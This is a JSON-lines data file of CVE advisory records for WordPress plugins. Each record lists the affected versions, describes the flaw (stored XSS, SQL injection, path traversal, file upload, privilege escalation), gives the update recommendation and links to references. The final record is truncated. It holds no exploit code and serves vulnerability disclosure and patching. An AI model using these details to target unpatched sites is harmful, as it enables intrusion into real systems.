{"CVE_ID":"CVE-2024-5426","slug":"photo-gallery","versionImpact":"1.8.23","versionEndExcluding":"1.8.24","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018svg\u2019 parameter in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. By default, this can only be exploited by administrators, but the ability to use and configure Photo Gallery can be extended to contributors on pro versions of the plugin.","recommendation":"Update to version 1.8.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13436238-f14a-445b-9a9b-fbcf23b7b498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13436238-f14a-445b-9a9b-fbcf23b7b498?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L521\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L542\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/UploadHandler.php#L542\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098798\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0221","slug":"photo-gallery","versionImpact":"1.8.19","versionEndExcluding":"1.8.20","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.","recommendation":"Update to version 1.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L441\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L291\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/trunk\\\/filemanager\\\/controller.php#L291\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0538","slug":"campaign-url-builder","versionEndExcluding":"1.8.2","description":"The Campaign URL Builder WordPress plugin before 1.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4869fdc7-4fc7-4917-bc00-b6ced9ccc871\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4869fdc7-4fc7-4917-bc00-b6ced9ccc871\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5543","slug":"slideshow-gallery","versionImpact":"1.8.1","versionEndExcluding":"1.8.2","description":"The Slideshow Gallery LITE plugin for WordPress is vulnerable to time-based SQL Injection via the id parameter in all versions up to, and including, 1.8.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5edd72d9-3086-4f4f-ae5b-830c8621b83a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5edd72d9-3086-4f4f-ae5b-830c8621b83a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slideshow-gallery\\\/trunk\\\/slideshow-gallery.php#L620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slideshow-gallery\\\/trunk\\\/slideshow-gallery.php#L620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100785%40slideshow-gallery%2Ftrunk&old=3098970%40slideshow-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100785%40slideshow-gallery%2Ftrunk&old=3098970%40slideshow-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4949","slug":"adsanity","versionEndExcluding":"1.8.2","description":"The AdSanity plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'ajax_upload' function in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers with Contributor+ level privileges to upload arbitrary files on the affected sites server which makes remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-adsanity-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/critical-vulnerability-in-wordpress-adsanity-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/effd72d2-876d-4f8d-b1e4-5ab38eab401b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/effd72d2-876d-4f8d-b1e4-5ab38eab401b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6924","slug":"photo-gallery","versionImpact":"1.8.18","versionEndExcluding":"1.8.19","description":"The Photo Gallery by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widgets in versions up to, and including, 1.8.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with administrator-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It can also be exploited with a contributor-level permission with a page builder plugin.","recommendation":"Update to version 1.8.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21b4d1a1-55fe-4241-820c-203991d724c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21b4d1a1-55fe-4241-820c-203991d724c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/Widget.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/Widget.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetSlideshow.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetSlideshow.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetTags.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.18\\\/admin\\\/views\\\/WidgetTags.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013021\\\/photo-gallery\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3013021\\\/photo-gallery\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11782","slug":"wp-mailster","versionImpact":"1.8.17.0","versionEndExcluding":"1.8.18.0","description":"The WP Mailster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mst_subscribe' shortcode in all versions up to, and including, 1.8.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.18.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailster\\\/tags\\\/1.8.17.0\\\/mailster\\\/subscr\\\/SubscriberPlugin.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailster\\\/tags\\\/1.8.17.0\\\/mailster\\\/subscr\\\/SubscriberPlugin.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198497\\\/wp-mailster\\\/trunk\\\/mailster\\\/subscr\\\/SubscriberPlugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198497\\\/wp-mailster\\\/trunk\\\/mailster\\\/subscr\\\/SubscriberPlugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/909beed4-06a9-4ec4-bf00-4072a38af82b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/909beed4-06a9-4ec4-bf00-4072a38af82b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4385","slug":"envo-extra","versionImpact":"1.8.16","versionEndExcluding":"1.8.17","description":"The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 1.8.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d78ff7-bd59-431e-b579-156e23ede053?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d78ff7-bd59-431e-b579-156e23ede053?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/counter\\\/counter.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/counter\\\/counter.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/icon-box\\\/icon-box.php#L909\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/icon-box\\\/icon-box.php#L909\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/team\\\/team.php#L1189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/team\\\/team.php#L1189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/testimonial\\\/testimonial.php#L899\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/testimonial\\\/testimonial.php#L899\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080715\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080715\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3899","slug":"envira-gallery-lite","versionImpact":"1.8.14","versionEndExcluding":"1.8.15","description":"The Gallery Plugin for WordPress  WordPress plugin before 1.8.15 does not sanitise and escape some of its image settings, which could allow users with post-writing privilege such as Author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3afadda-4d9a-4a51-b744-10de7d8d8578\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3afadda-4d9a-4a51-b744-10de7d8d8578\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1427","slug":"photo-gallery","versionEndExcluding":"1.8.15","description":"- The Photo Gallery by 10Web WordPress plugin before 1.8.15 did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8917ba2-4cb3-4b09-8a49-b7c612254946\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8917ba2-4cb3-4b09-8a49-b7c612254946\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13228","slug":"qubely","versionImpact":"1.8.13","versionEndExcluding":"1.8.14","description":"The Qubely \u2013 Advanced Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.13 via the 'qubely_get_content'. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, password-protected, draft, and trashed post data.","recommendation":"Update to version 1.8.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/QUBELY.php#L1172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/QUBELY.php#L1172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253223\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253223\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c66e71-dddb-4142-ae13-da3caffd8714?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c66e71-dddb-4142-ae13-da3caffd8714?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9601","slug":"qubely","versionImpact":"1.8.12","versionEndExcluding":"1.8.13","description":"The Qubely \u2013 Advanced Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019  and 'UniqueID' parameter in all versions up to, and including, 1.8.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/blocks\\\/postgrid.php#L1419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/blocks\\\/postgrid.php#L1419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235188\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235188\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58387a60-ef68-4911-9349-97b0f7e7726f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58387a60-ef68-4911-9349-97b0f7e7726f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4574","slug":"graphina-elementor-charts-and-graphs","versionImpact":"1.8.9","versionEndExcluding":"1.8.10","description":"The Graphina \u2013 Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/pie\\\/widget\\\/pie_google_chart.php#L391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/pie\\\/widget\\\/pie_google_chart.php#L391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/line\\\/widget\\\/line_google_chart.php#L578\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/line\\\/widget\\\/line_google_chart.php#L578\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/donut\\\/widget\\\/donut_google_chart.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/donut\\\/widget\\\/donut_google_chart.php#L384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/column\\\/widget\\\/column_google_chart.php#L536\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/column\\\/widget\\\/column_google_chart.php#L536\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/bar\\\/widget\\\/bar_google_chart.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/bar\\\/widget\\\/bar_google_chart.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/area\\\/widget\\\/area_google_chart.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/area\\\/widget\\\/area_google_chart.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/timeline\\\/widget\\\/timeline_chart.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/timeline\\\/widget\\\/timeline_chart.php#L462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/scatter\\\/widget\\\/scatter_chart.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/scatter\\\/widget\\\/scatter_chart.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radial\\\/widget\\\/radial_chart.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radial\\\/widget\\\/radial_chart.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radar\\\/widget\\\/radar_chart.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radar\\\/widget\\\/radar_chart.php#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/polar\\\/widget\\\/polar_chart.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/polar\\\/widget\\\/polar_chart.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/pie\\\/widget\\\/pie_chart.php#L279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/pie\\\/widget\\\/pie_chart.php#L279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/line\\\/widget\\\/line_chart.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/line\\\/widget\\\/line_chart.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/heatmap\\\/widget\\\/heatmap_chart.php#L448\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/heatmap\\\/widget\\\/heatmap_chart.php#L448\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/donut\\\/widget\\\/donut_chart.php#L325\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/donut\\\/widget\\\/donut_chart.php#L325\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/distributed_column\\\/widget\\\/Distributed_Column_chart.php#L464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/distributed_column\\\/widget\\\/Distributed_Column_chart.php#L464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/column\\\/widget\\\/column_chart.php#L531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/column\\\/widget\\\/column_chart.php#L531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/candle\\\/widget\\\/candle_chart.php#L517\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/candle\\\/widget\\\/candle_chart.php#L517\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/bubble\\\/widget\\\/bubble_chart.php#L685\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/bubble\\\/widget\\\/bubble_chart.php#L685\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/area\\\/widget\\\/area_chart.php#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/area\\\/widget\\\/area_chart.php#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1febe2d8-d354-4c78-a611-c1bb0937e53d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1febe2d8-d354-4c78-a611-c1bb0937e53d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8791","slug":"charitable","versionImpact":"1.8.1.14","versionEndExcluding":"1.8.1.15","description":"The Donation Forms by Charitable \u2013 Donations Plugin & Fundraising Platform for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.8.1.14. This is due to the plugin not properly verifying a user's identity when the ID parameter is supplied through the update_core_user() function. This makes it possible for unauthenticated attackers to update the email address and password of arbitrary user accounts, including administrators, which can then be used to log in to those user accounts.","recommendation":"Update to version 1.8.1.15, or a newer patched 